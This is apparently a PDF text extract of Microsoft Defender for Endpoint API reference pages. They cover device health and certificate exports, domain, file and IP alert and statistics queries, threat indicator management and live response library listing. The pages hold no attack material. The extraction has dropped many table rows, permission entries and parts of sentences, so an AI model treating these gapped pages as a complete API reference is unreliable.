"avPlatformUpdateTime": "2022-06-20T16:59:35Z",
"avIsSignatureUpToDate": "True",
"avIsEngineUpToDate": "True",
"avIsPlatformUpToDate": "True",
"avSignaturePublishTime": "2022-08-02T00:03:39Z",
"rbacGroupName": "TVM1",
"rbacGroupId": 4415
},
...
2 Export health reporting (via files)
） Important
Information in this section relates to prereleased product which may be


This API response contains all the data of Antivirus health and status per device. Returns
a table with an entry for every unique combination of:
DeviceId
device name
AV mode
Up-to-date status
Scan results
2.1.2 Limitations
2.2 Permissions
One of the following permissions is required to call this API.
ﾉ Expand table
Application Vulnerability.Read.All 'Read "threat and vulnerability management"

Delegated (work or Vulnerability.Read 'Read "threat and vulnerability management"

To learn more, including how to choose permissions, see Use Microsoft Defender for
Endpoint APIs for details.
2.3 URL
HTTP
GET /api/machines/InfoGatheringExport
2.4 Parameters
sasValidHours : The number of hours that the download URLs will be valid for
(Maximum 24 hours).
2.5 Properties
See: 1.4 Export device antivirus health details API properties (via files).
2.6 Examples

Here's an example request:
HTTP
GET https://api-
us.securitycenter.contoso.com/api/machines/InfoGatheringExport

Here's an example response:
JSON
"@odata.context": "https://api-
us.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api
.ExportFilesResponse",
"exportFiles": [
"https://tvmexportexternalprdeus.blob.core.windows.net/temp-../2022-
08-02/2201/InfoGatheringExport/json/OrgId=../_RbacGroupId=../part-00055-
12fc2fcd-8f56-4e09-934f-e8efe7ce74a0.c000.json.gz?sv=2020-08-04&st=2022-08-
02T22%3A47%3A11Z&se=2022-08-03T01%3A47%3A11Z&sr=b&sp=r&sig=..",
"https://tvmexportexternalprdeus.blob.core.windows.net/temp-../2022-
08-02/2201/InfoGatheringExport/json/OrgId=../_RbacGroupId=../part-00055-
12fc2fcd-8f56-4e09-934f-e8efe7ce74a0.c000.json.gz?sv=2020-08-04&st=2022-08-
02T22%3A47%3A11Z&se=2022-08-03T01%3A47%3A11Z&sr=b&sp=r&sig=.."
],
 Tip


top scans per file
See also
Export device health methods and properties
Device health and compliance reporting
 Tip
Feedback

Export certificate inventory per device
Article • 09/27/2023
Applies to:


There are different API calls to get different types of data. In general, each API call
contains the requisite data for devices in your organization.
the next results.
contains URLs to download all the data from Azure Storage. You can download
like.
７ Note
Unless indicated otherwise, all export security baseline assessment methods listed
are full export and by device (also referred to as per device)
1. Export certificate assessment (JSON
response)

Returns all certificate assessments for all devices, on a per-device basis. It returns a table
with a separate entry for every unique combination of DeviceId, Thumbprint and Path.
1.1.1 Limitations

1.2 Permissions
ﾉ Expand table

Delegated (work or school Vulnerability.Read 'Read Threat and Vulnerability Management

1.3 URL
HTTP
GET /api/machines/certificateAssessmentByMachine
1.4 Parameters
$top: Number of results to return (doesn't return @odata.nextLink and so doesn't
pull all the data).
７ Note
Each record is approximately 1 KB of data. You should take this into account when
choosing the correct pageSize parameter.
temporary and might be removed. Only use the documented columns.
The properties defined in the following table are listed alphabetically by property
ID. When running this API, the resulting output will not necessarily be returned in
the same order listed in this table.
ﾉ Expand table

type
DeviceName String Fully qualified domain name (FQDN) of the device.
Thumbprint Boolean Unique identifier for the certificate.
Path String The location of the certificate.
SignatureAlgorithm String Hashing algorithm and encryption algorithm used.
KeySize String Size of the key used in the signature algorithm.
ExpirationDate String The date and time beyond which the certificate is no longer
valid.
IssueDate String The earliest date and time when the certificate became valid.
SubjectType String Indicates if the holder of the certificate is a CA or end entity.
SerialNumber String Unique identifier for the certificate within a certificate authority's
systems.
IssuedTo Object Entity that a certificate belongs to; can be a device, an individual,
or an organization.
IssuedBy Object Entity that verified the information and signed the certificate.
KeyUsage String The valid cryptographic uses of the certificate's public key.
type
ExtendedKeyUsage String Other valid uses for the certificate.
RbacGroupId String The role-based access control (RBAC) group id.
RbacGroupName String The role-based access control (RBAC) group. If this device isn't
assigned to any RBAC groups, the value will be "Unassigned." If
the organization doesn't contain any RBAC groups, the value will
be "None."
1.6 Example

HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/CertificateAssessmentB
yMachine

JSON
"@odata.context":"https://127.0.0.1/api/$metadata#Collection(microsoft.windo
wsDefenderATP.api.AssetCertificateAssessment)",
"value":[
{
"deviceId":"49126b9e4a5473b5229c73799e9e55c48668101b",
"deviceName":"testmachine5",
"thumbprint":"A4B37F4F6DE956922273D5CB8E7E0AAFB7033B90",
"path":"LocalMachine\\TestSignRoot\\A4B37F4F6DE956922273D5CB8E7E0AAFB7033B90
",
"signatureAlgorithm":"sha384ECDSA",
"keyLength":0,"notAfter":"0001-01-01T00:00:00Z",
"notBefore":"0001-01-01T00:00:00Z",
"subjectType":"CA",
"serialNumber":"6086A185EAFA2B9943B4671603F40323",
"subjectObject":null,
"issuerObject":null,
"keyUsageArray":null,
"extendedKeyUsageArray":null,
"isSelfSigned":false,
"rbacGroupId":4226,
"rbacGroupName":"testO6343398Gq31"}],
"@odata.nextLink":"https://127.0.0.1/api/machines/CertificateAssessmentByMac
hine?
pagesize=1&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMi0wMy
0yMS8wNTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjF9"
}
2. Export certificate assessment (via files)

Returns all certificate assessments for all devices, on a per-device basis. It returns a table
with a separate entry for every unique combination of DeviceId, Thumbprint and Path.
2.1.1 Limitations
2.2 Permissions
ﾉ Expand table

Delegated (work or school Vulnerability.Read 'Read Threat and Vulnerability Management

2.3 URL
HTTP
GET /api/machines/certificateAssessmentExport
2.4 Parameters
(Maximum 24 hours).
７ Note
The download URLs are only valid for 3 hours; otherwise, you can use the
parameter.
To maximize download speeds, make sure you are downloading the data from the
same Azure region where your data resides.
Each record is approximately 1KB of data. You should take this into account when
choosing the pageSize parameter that works for you.
ﾉ Expand table
Export files String[array] A list of download URLs for files holding the current snapshot of
the organization.
GeneratedTime DateTime The time the export was generated.
2.6 Example

HTTP
GET
https://api.securitycenter.contoso.com/api/machines/certificateAssessmentExp
ort
JSON
"@odata.context":"https://127.0.0.1/api/$metadata#microsoft.windowsDefenderA
TP.api.ExportFilesResponse",
"exportFiles":
["https://tvmexportexternalstgeus.blob.core.windows.net/temp-5c080622-f613-
42bb-9fee-e17ccdff90d3/2022-03-
20/1318/CertificateAssessmentExport/json/OrgId=47d41a0c-188d-46d3-bbea-
a93dbc0bfcaa/_RbacGroupId=4226/part-00000-65a62a9d-7a01-4d78-bbdb-
6d3e07b34cc9.c000.json.gz?sv=2020-02-10&st=2022-03-20T13%3A35%3A37Z&se=2022-
03-
20T16%3A35%3A37Z&sr=b&sp=r&sig=IMmwTOYmGvU0ei5AHLNAxnFCmZkE2jvBHzRmuAu9xaA%3
D","https://tvmexportexternalstgeus.blob.core.windows.net/temp-5c080622-
f613-42bb-9fee-e17ccdff90d3/2022-03-
03-
20T16%3A35%3A37Z&sr=b&sp=r&sig=2r0y74WZsATa0DjQTwfBxNqL5vN2Wl0AZKHMNrxuJ30%3
D","https://tvmexportexternalstgeus.blob.core.windows.net/temp-5c080622-
f613-42bb-9fee-e17ccdff90d3/2022-03-
03-
20T16%3A35%3A37Z&sr=b&sp=r&sig=uVdY4%2BBpMdPMwaD3G0RJTZkS4R9J8oN8I3tu%2FOcG3
5c%3D"],
"generatedTime":"2022-03-20T13:18:00Z"
}
 Tip
Feedback

Get domain-related alerts API
Article • 11/15/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of Alerts related to a given domain address.
Limitations
You can query on alerts last updated according to your configured retention
period.
Permissions
ﾉ Expand table
７ Note
Response will include only alerts, associated with devices, that the user have
access to, based on device group settings (See Create and manage device
groups for more information)
HTTP request
HTTP
GET /api/domains/{domain}/alerts
Request headers
ﾉ Expand table
Header Value
Authorization String
Request body
Empty
Response
If successful and domain exists - 200 OK with list of alert entities. If domain does not
exist - 200 OK with an empty set.
Example
Request
HTTP
GET
https://api.securitycenter.microsoft.com/api/domains/client.wns.windows.com/
alerts
 Tip
Feedback

Get domain-related machines API
Article • 11/15/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of Machines that have communicated to or from a given domain
address.
Limitations
1. You can query on devices last updated according to your configured retention
period.
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
Response will include only devices that the user can access, based on device
group settings (For more information, see Create and manage device groups
HTTP request
HTTP
GET /api/domains/{domain}/machines
Request headers
ﾉ Expand table

Request body
Empty
Response
If successful and domain exists - 200 OK with list of machine entities. If domain doesn't
Example
Request
HTTP
GET
https://api.securitycenter.microsoft.com/api/domains/api.securitycenter.micr
osoft.com/machines
 Tip
Feedback

Get domain statistics API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves the statistics on the given domain.
Limitations
2. The maximum value for lookbackhours is 720 hours (30 days).
Permissions
ﾉ Expand table
Application URL.Read.All 'Read URLs'
Delegated (work or school account) URL.Read.All 'Read URLs'
７ Note
HTTP request
HTTP
GET /api/domains/{domain}/stats
Request headers
ﾉ Expand table
Header Value
Authorization Bearer {token}. Required.
Request URI parameters

ﾉ Expand table
lookBackHours Int32 Defines the hours we search back to get the statistics. Defaults to 30
days. Optional.
Request body
Empty
Response
If successful and domain exists - 200 OK, with statistics object in the response body. If
domain doesn't exist - 200 OK with a prevalence set to 0.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/domains/example.com/stats?
lookBackHours=48
Response example
JSON
{
"@odata.context":
enderATP.api.InOrgDomainStats",
"host": "example.com",
"organizationPrevalence": 4070,
"orgFirstSeen": "2017-07-30T13:23:48Z",
"orgLastSeen": "2017-08-29T13:09:05Z"
}
 Tip
Feedback

File resource type
Article • 02/23/2024
Applies to:

７ Note
 Tip
Represent a file entity in Defender for Endpoint.
Methods
ﾉ Expand table
Get file file Get a single file
List file related alerts alert collection Get the alert entities that are associated with the
file.
List file related machine Get the machine entities associated with the alert.
machines collection
file statistics Statistics Retrieves the prevalence for the given file.
summary
Properties
ﾉ Expand table
sha1 String Sha1 hash of the file content
sha256 String Sha256 hash of the file content
globalPrevalence Nullable long File prevalence across organization
globalFirstObserved DateTimeOffset First time the file was observed
globalLastObserved DateTimeOffset Last time the file was observed
size Nullable long Size of the file
fileType String Type of the file
isPeFile Boolean true if the file is portable executable (for example DLL ,
EXE , etc.)
filePublisher String File publisher
fileProductName String Product name
signer String File signer
issuer String File issuer
signerHash String Hash of the signing certificate
isValidCertificate Boolean Was signing certificate successfully verified by Microsoft

Defender for Endpoint agent
determinationType String The determination type of the file
determinationValue String Determination value
Json representation
JSON
{
"sha1": "4388963aaa83afe2042a46a3c017ad50bdcdafb3",
"sha256":
"413c58c8267d2c8648d8f6384bacc2ae9c929b2b96578b6860b5087cd1bd6462",
"size": 22139496,
"fileType": "APP",
"isPeFile": true,
"filePublisher": "CHENGDU YIWO Tech Development Co., Ltd.",
"fileProductName": "EaseUS MobiSaver for Android",
"signer": "CHENGDU YIWO Tech Development Co., Ltd.",
"issuer": "VeriSign Class 3 Code Signing 2010 CA",
"signerHash": "6c3245d4a9bc0244d99dff27af259cbbae2e2d16",
"isValidCertificate": false,
"determinationType": "Pua",
"determinationValue": "PUA:Win32/FusionCore"
}
 Tip
Feedback

Get file information API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves a File by identifier Sha1, or Sha256
Limitations
Permissions
ﾉ Expand table
Application File.Read.All 'Read all file profiles'
Delegated (work or school account) File.Read.All 'Read all file profiles'
７ Note
HTTP request
HTTP
GET /api/files/{id}
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and file exists - 200 OK with the file entity in the body. If file doesn't exist -
404 Not Found.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/files/4388963aaa83afe2042a46a3c
017ad50bdcdafb3
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Files/$entity",
"sha1": "4388963aaa83afe2042a46a3c017ad50bdcdafb3",
"sha256":
"413c58c8267d2c8648d8f6384bacc2ae9c929b2b96578b6860b5087cd1bd6462",
"size": 22139496,
"fileType": "APP",
"isPeFile": true,
"filePublisher": "CHENGDU YIWO Tech Development Co., Ltd.",
"fileProductName": "EaseUS MobiSaver for Android",
"signer": "CHENGDU YIWO Tech Development Co., Ltd.",
"issuer": "VeriSign Class 3 Code Signing 2010 CA",
"signerHash": "6c3245d4a9bc0244d99dff27af259cbbae2e2d16",
"isValidCertificate": false,
"determinationType": "Pua",
"determinationValue": "PUA:Win32/FusionCore"
}
 Tip
Feedback

Get file-related alerts API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of alerts related to a given file hash.
Limitations
2. Only SHA-1 Hash Function is supported (not MD5 or SHA-256).
Permissions
how to choose permissions, see Use Defender for Endpoint APIs
ﾉ Expand table
７ Note
access to, based on device group settings (For more information, see Create
and manage device groups)
HTTP request
HTTP
GET /api/files/{id}/alerts
Request headers
ﾉ Expand table

Request body
Empty
Response
If successful and file exists - 200 OK with list of alert entities in the body. If file doesn't
Example
Request
HTTP
GET
https://api.securitycenter.microsoft.com/api/files/6532ec91d513acc05f43ee0aa
3002599729fd3e1/alerts
 Tip
Feedback

Get file-related machines API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of Machines related to a given file hash.
Limitations
2. Only SHA-1 Hash Function is supported (not MD5 or SHA-256).
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
Response will include only devices, that the user have access to, based on
device group settings (For more information, see Create and manage device
groups)
HTTP request
HTTP
GET /api/files/{id}/machines
Request headers
ﾉ Expand table

Request body
Empty
Response
If successful and file exists - 200 OK with list of machine entities in the body. If file
doesn't exist - 200 OK with an empty set.
Example
Request
HTTP
GET
https://api.securitycenter.microsoft.com/api/files/1e5bc9d7e413ddd7902c2932e
418702b84d0cc07/machines
 Tip
Feedback

Get file statistics API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves the statistics for the given file.
Limitations
2. The maximum value for lookbackhours is 720 Hours(30 days).
Permissions
ﾉ Expand table
Application File.Read.All 'Read file profiles'
Delegated (work or school account) File.Read.All 'Read file profiles'
７ Note
HTTP request
HTTP
GET /api/files/{id}/stats
Request headers
ﾉ Expand table

ﾉ Expand table
days. Optional.
Request body
Empty
Response
If successful and file exists - 200 OK with statistical data in the body. If file does not exist
- 404 Not Found.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/files/0991a395da64e1c5fbe8732ed
11e6be064081d9f/stats?lookBackHours=48
Response example
JSON
{
"@odata.context":
enderATP.api.InOrgFileStats",
"sha1": "0991a395da64e1c5fbe8732ed11e6be064081d9f",
"orgFirstSeen": "2019-12-07T13:44:16Z",
"orgLastSeen": "2020-01-06T13:39:36Z",
"globallyPrevalence": 705012,
"globalLastObserved": "2020-01-06T13:39:36Z",
"topFileNames": [
"MREC.exe"
]
}
 Tip
Feedback

Indicator resource type
Article • 02/22/2024
Applies to:

７ Note
 Tip
See the corresponding Indicators page in the portal.
ﾉ Expand table
List Indicators Indicator Collection List Indicator entities.
Submit Indicator Indicator Submit or update Indicator entity.
Import Indicators Indicator Collection Submit or update Indicators entities.
Delete Indicator No Content Deletes Indicator entity.
Properties
ﾉ Expand table
id String Identity of the Indicator entity.
indicatorValue String The value of the Indicator.
indicatorType Enum Type of the indicator. Possible values are: FileSha1 ,

FileSha256 , FileMd5 , CertificateThumbprint ,
IpAddress , DomainName , and Url .
application String The application associated with the indicator.
action Enum The action that is taken if the indicator is

discovered in the organization. Possible values are:
Warn , Block , Audit , Alert , AlertAndBlock ,
BlockAndRemediate , and Allowed .
externalID String Id the customer can submit in the request for

custom correlation.
sourceType Enum User in case the Indicator created by a user (for

example, from the portal), AadApp in case it
submitted using automated application via the API.
createdBySource string The name of the user/application that submitted

the indicator.
createdBy String Unique identity of the user/application that

submitted the indicator.
lastUpdatedBy String Identity of the user/application that last updated

the indicator.
creationTimeDateTimeUtc DateTimeOffset The date and time when the indicator was created.
expirationTime DateTimeOffset The expiration time of the indicator.
lastUpdateTime DateTimeOffset The last time the indicator was updated.

Informational , Low , Medium , and High .
title String Indicator title.
description String Description of the indicator.
recommendedActions String Recommended actions for the indicator.
rbacGroupNames List of strings RBAC device group names where the indicator is
exposed and active. Empty list in case it exposed to
all devices.
rbacGroupIds List of strings RBAC device group IDs where the indicator is
exposed and active. Empty list in case it exposed to
all devices.
generateAlert Enum True if alert generation is required, False if this

indicator shouldn't generate an alert.
Indicator Types
The indicator action types supported by the API are:
Allowed
Audit
Block
BlockAndRemediate
Warn (Defender for Cloud Apps only)
For more information on the description of the response action types, see Create
indicators.
７ Note
The prior response actions (AlertAndBlock, and Alert) will be supported until
January 2022. After this date, all customers must be use one of the action types
listed in this section.
Json representation
JSON
{
"id": "994",
"indicatorValue":
"881c0f10c75e64ec39d257a131fcd531f47dd2cff2070ae94baa347d375126fd",
"indicatorType": "FileSha256",
"action": "AlertAndBlock",
"application": null,
"source": "user@contoso.onmicrosoft.com",
"sourceType": "User",
"createdBy": "user@contoso.onmicrosoft.com",
"severity": "Informational",
"title": "Michael test",
"description": "test",
"recommendedActions": "nothing",
"creationTimeDateTimeUtc": "2019-12-19T09:09:46.9139216Z",
"expirationTime": null,
"lastUpdatedBy": null,
"rbacGroupNames": ["team1"]
}
See also
 Tip
Feedback

List Indicators API
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Retrieves a collection of all active Indicators.
The OData's $filter query is supported on: application , createdByDisplayName ,

expirationTime , generateAlert , title , rbacGroupNames , rbacGroupIds , indicatorValue ,
indicatorType , creationTimeDateTimeUtc , createdBy , action , and severity properties.
$stop with max value of 10,000.

$skip .

Limitations
Permissions
how to choose permissions, see Get started.
ﾉ Expand table
Application Ti.ReadWrite Read and write Indicators
Application Ti.ReadWrite.All Read and write All Indicators
Delegated (work or school account) Ti.ReadWrite Read and write Indicators
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/indicators
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200, Ok response code with a collection of Indicator
entities.
７ Note
If the Application has Ti.ReadWrite.All permission, it will be exposed to all

Indicators. Otherwise, it will be exposed only to the Indicators it created.
Example 1
Example 1 request
Here's an example of a request that gets all indicators.
HTTP
GET https://api.securitycenter.microsoft.com/api/indicators
Example 1 response
JSON
HTTP/1.1 200 Ok
Content-type: application/json
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Indicators",
"value": [
{
"id": "995",
"indicatorValue": "12.13.14.15",
"indicatorType": "IpAddress",
"action": "Alert",
"application": "demo-test",
"source": "TestPrdApp",
"sourceType": "AadApp",
"title": "test",
"createdBy": "45097602-1234-5678-1234-9f453233e62c",
"expirationTime": "2020-12-12T00:00:00Z",
"lastUpdatedBy": TestPrdApp,
"recommendedActions": "test",
"rbacGroupNames": []
},
{
"id": "996",
"indicatorValue": "220e7d15b0b3d7fac48f2bd61114db1022197f7f",
"title": "test",
"createdBy": "45097602-1234-5678-1234-9f453233e62c",
"recommendedActions": "TEST",
"rbacGroupNames": [ "Group1", "Group2" ]
}
...
]
}
Example 2
Example 2 request
Here's an example of a request that gets all Indicators with AlertAndBlock action.
HTTP
GET https://api.securitycenter.microsoft.com/api/indicators?
$filter=action+eq+'AlertAndBlock'
Example 2 response
JSON
HTTP/1.1 200 Ok
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Indicators",
"value": [
{
"id": "997",
"indicatorValue": "111e7d15b0b3d7fac48f2bd61114db1022197f7f",
"title": "test",
"createdBy": "45097602-1234-5678-1234-9f453233e62c",
"recommendedActions": "TEST",
"rbacGroupNames": [ "Group1", "Group2" ]
}
...
]
}
 Tip
Feedback

Submit or Update Indicator API
Article • 02/23/2024
Applies to:

７ Note
 Tip
API description
Submits or Updates new Indicator entity.
CIDR notation for IPs isn't supported.
Limitations
2. There's a limit of 15,000 active indicators per tenant.
Permissions
ﾉ Expand table
HTTP request
HTTP
POST https://api.securitycenter.microsoft.com/api/indicators
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
indicatorValue String Identity of the Indicator entity. Required
indicatorType Enum Type of the indicator. Possible values are: FileSha1 ,

FileMd5 , CertificateThumbprint , FileSha256 ,
IpAddress , DomainName , and Url . Required
action Enum The action that is taken if the indicator is discovered in

the organization. Possible values are: Alert , Warn ,
Block , Audit , BlockAndRemediate , AlertAndBlock , and
Allowed . Required. The GenerateAlert parameter must
be set to TRUE when creating an action with Audit .
application String The application associated with the indicator. This field
only works for new indicators. It doesn't update the
value on an existing indicator. Optional
title String Indicator alert title. Required
description String Description of the indicator. Required
expirationTime DateTimeOffset The expiration time of the indicator. Optional

Informational , Low , Medium , and High . Optional
recommendedActions String TI indicator alert recommended actions. Optional
rbacGroupNames String Comma-separated list of RBAC group names the

indicator would be applied to. Optional
educateUrl String Custom notification/support URL. Supported for Block

and Warn action types for URL indicators. Optional
generateAlert Enum True if alert generation is required, False if this

indicator shouldn't generate an alert.
Response
If successful, this method returns 200 - OK response code and the created /
updated Indicator entity in the response body.
If not successful: this method return 400 - Bad Request. Bad request usually
indicates incorrect body.
Example
Request
HTTP
POST https://api.securitycenter.microsoft.com/api/indicators
JSON
{
"indicatorValue": "220e7d15b011d7fac48f2bd61114db1022197f7f",
"title": "test",
"rbacGroupNames": ["group1", "group2"]
}
Related article
Manage indicators
 Tip
Feedback

Import Indicators API
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Submits or Updates batch of Indicator entities.
CIDR notation for IPs isn't supported.
Limitations
1. Rate limitations for this API are 30 calls per minute.
2. There's a limit of 15,000 active Indicators per tenant.
3. Maximum batch size for one API call is 500.
Permissions
ﾉ Expand table
HTTP request
HTTP
POST https://api.securitycenter.microsoft.com/api/indicators/import
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Indicators List<Indicator> List of Indicators. Required
Response
If successful, this method returns 200 - OK response code with a list of import
results per indicator, see the following example.
If not successful: this method return 400 - Bad Request. Bad request usually
Example
Request example
HTTP
POST https://api.securitycenter.microsoft.com/api/indicators/import
JSON
{
"Indicators":
[
{
"indicatorValue": "220e7d15b011d7fac48f2bd61114db1022197f7f",
"title": "demo",
"action": "Alert",
"description": "demo2",
"rbacGroupNames": ["group1", "group2"]
},
{
"indicatorValue":
"2233223322332233223322332233223322332233223322332233223322332222",
"title": "demo2",
"application": "demo-test2",
"action": "Alert",
"severity": "Medium",
"description": "demo2",
"rbacGroupNames": []
}
]
}
Response example
JSON
{
"value": [
{
"id": "2841",
"indicator": "220e7d15b011d7fac48f2bd61114db1022197f7f",
"isFailed": false,
"failureReason": null
},
{
"id": "2842",
"indicator":
"2233223322332233223322332233223322332233223322332233223322332222",
"isFailed": false,
"failureReason": null
}
]
}
Related article
Manage indicators
 Tip
Feedback

Delete Indicator API
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Deletes an Indicator entity by ID.
Limitations
Permissions
ﾉ Expand table
Application Ti.ReadWrite 'Read and write TI Indicators'
Application Ti.ReadWrite.All 'Read and write Indicators'
HTTP request
HTTP
Delete https://api.securitycenter.microsoft.com/api/indicators/{id}
 Tip
Request headers
ﾉ Expand table
Request body
Empty
Response
If Indicator exists and deleted successfully - 204 OK without content.
If Indicator with the specified ID wasn't found - 404 Not Found.

Example
Request
HTTP
DELETE https://api.securitycenter.microsoft.com/api/indicators/995
 Tip
Feedback

Batch Delete Indicators
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Deletes Indicator entities by ID.
Limitations
Batch size limit of up to 500 Indicator IDs.
Permissions
ﾉ Expand table
Application Ti.ReadWrite 'Read and write TI Indicators'
Application Ti.ReadWrite.All 'Read and write Indicators'
HTTP request
HTTP
POST https://api.securitycenter.microsoft.com/api/indicators/BatchDelete
 Tip
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
IndicatorIds List String A list of the IDs of the indicators to be removed. Required
Response
If Indicators all existed and were deleted successfully - 204 OK without content.
If indicator IDs list is empty or exceeds size limit - 400 Bad Request.
If any indicator ID is invalid - 400 Bad Request.
If requestor isn't exposed to any indicator's device groups - 403 Forbidden.
If any Indicator ID wasn't found - 404 Not Found.
Example
Request
HTTP
POST https://api.securitycenter.microsoft.com/api/indicators/BatchDelete
JSON
{
"IndicatorIds": [ "1", "2", "5" ]
}
Feedback

Information gathering assessment per
device
Article • 09/27/2023
Applies to:

This API response returns all information gathering assessments for all devices, on a per-
device basis. It returns a table with a separate entry for every DeviceId.
It pulls all relevant data in your organization as a download file. The response contains
URLs to download all the data from Azure Storage. This API enables you to download all
your data from Azure Storage as follows:
Data that is collected (using via files) is the current snapshot of the current state. It
doesn't contain historic data. To collect historic data, customers must save the data in
their own data storages.
７ Note
1. Export information gathering assessment (via

files)
Returns all information gathering assessments for all devices, on a per-device basis. It
returns a table with a separate entry for every DeviceId.
Limitations
1.2 Permissions
ﾉ Expand table


1.3 URL
HTTP
GET /api/Machines/InfoGatheringExport
1.4 Parameters
(Maximum 24 hours)
1.5 Properties
７ Note

The download URLs are only valid for 3 hours; otherwise, you can use the
parameter.
ﾉ Expand table
Export files String[array] A list of download URLs for files holding the current snapshot of
the organization.
GeneratedTime DateTime The time the export was generated.
1.6 Examples
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/InfoGatheringExport?
$sasValidHours=1
JSON
{
"@odata.context":
"exportFiles": [
43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-
26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-
a93dbc0bfcaa/_RbacGroupId=0/part-00001-42240b35-4a40-45f7-9b46-
96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-
07-
26T16%3A36%3A30Z&sr=b&sp=r&sig=9GVFFNbgkLc69u32nO944SosmcTUj0usPJqkJwx5iow%3
D",
43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-
07-
26T16%3A36%3A30Z&sr=b&sp=r&sig=BJ3SfwcyI7JnoTVhHAgiyvqWviA%2BUKdF80KeVIUc%2F
IU%3D",
43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-
07-
26T16%3A36%3A30Z&sr=b&sp=r&sig=6ZsI%2FysPufyNgx234GX8A5xVuz%2FtCtq%2FQ42R2P%
2F3XO4%3D",
43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-
07-
26T16%3A36%3A30Z&sr=b&sp=r&sig=iqJUkdUsR%2FvGL6hSA2Vqnv02%2BkRJtDhUReJHYd5TO
dM%3D"
],
}
Other related
DeviceTvmInfoGathering
DeviceTvmInfoGatheringKB
 Tip
Feedback

Get IP related alerts API
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Retrieves a collection of alerts related to a given IP address.
Limitations
Permissions
ﾉ Expand table
７ Note
The user needs to have at least the following role permission: View Data . For
more information, see Create and manage roles for more information.
Response includes only alerts, associated with devices, that the user have
HTTP request
HTTP
GET /api/ips/{ip}/alerts
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and IP exists - 200 OK with list of alert entities in the body. If IP address is
unknown but valid, it returns an empty set. If the IP address is invalid, it returns HTTP
400.
Example
Request
HTTP
GET https://api.securitycenter.microsoft.com/api/ips/10.209.67.177/alerts
 Tip
Feedback

Get IP statistics API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves the statistics for the given IP.
Limitations
2. Maximum Value for Lookbackhours is 720 Hours(30days).
Permissions
ﾉ Expand table
Application Ip.Read.All 'Read IP address profiles'
Delegated (work or school account) Ip.Read.All 'Read IP address profiles'
７ Note
HTTP request
HTTP
GET /api/ips/{ip}/stats
Request headers
ﾉ Expand table

ﾉ Expand table
days. Optional.
Request body
Empty
Response
If successful and ip exists - 200 OK with statistical data in the body. IP is valid but
doesn't exist - organizationPrevalence 0, IP is invalid - HTTP 400.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/ips/10.209.67.177/stats?
lookBackHours=48
Response example
JSON
{
"@odata.context":
enderATP.api.InOrgIPStats",
"ipAddress": "10.209.67.177",
"orgFirstSeen": "2017-07-30T13:36:06Z",
"orgLastSeen": "2017-08-29T13:32:59Z"
}
ﾉ Expand table
Name Description
Organization the distinct count of devices that opened network connection to this
prevalence IP.
Name Description
Org first seen the first connection for this IP in the organization.
Org last seen the last connection for this IP in the organization.
７ Note
This statistic information is based on data from the past 30 days.
 Tip
Feedback

Live response library methods and
properties
Article • 07/18/2023
Applies to: Microsoft Defender for Endpoint
） Important

７ Note
 Tip
Methods
ﾉ Expand table
List library files Library file collection List library file entities
Upload to library Library file entity Upload a file to live response library
Delete from library No content Delete library file entity
Properties
ﾉ Expand table
Commands Live Response command Array of Command objects. See live response
collection commands.
 Tip
Feedback

List library files
Article • 09/27/2023
Applies to: Microsoft Defender for Endpoint
） Important

７ Note
 Tip
API description
List live response library files.
Limitations
Permissions
ﾉ Expand table
Application Library.Manage Manage live response library
Delegated (work or school account) Library.Manage Manage live response library
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/libraryfiles
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 - OK response code with a collection of live
response library file entities.
Example
Request
Here's an example of a request that gets all live response library files.
HTTP
GET https://api.securitycenter.microsoft.com/api/libraryfiles
Response example
JSON
HTTP/1.1 200 Ok
{
"\@odata.context": "https://api.securitycenter.microsoft.com
/api/\$metadata\#LibraryFiles",
"value": [
{
"fileName": "script1.ps1",
"sha256":
"6e212a0db618507c44e4ec8ee7499dfef7e5767e5f8d31144df3b96fd1145caf",
"description": null,
"creationTime": "2019-10-24T10:54:23.2009016Z",
"lastUpdatedTime": "2019-10-24T10:54:23.2009016Z",
"createdBy": "admin",
"hasParameters": true,
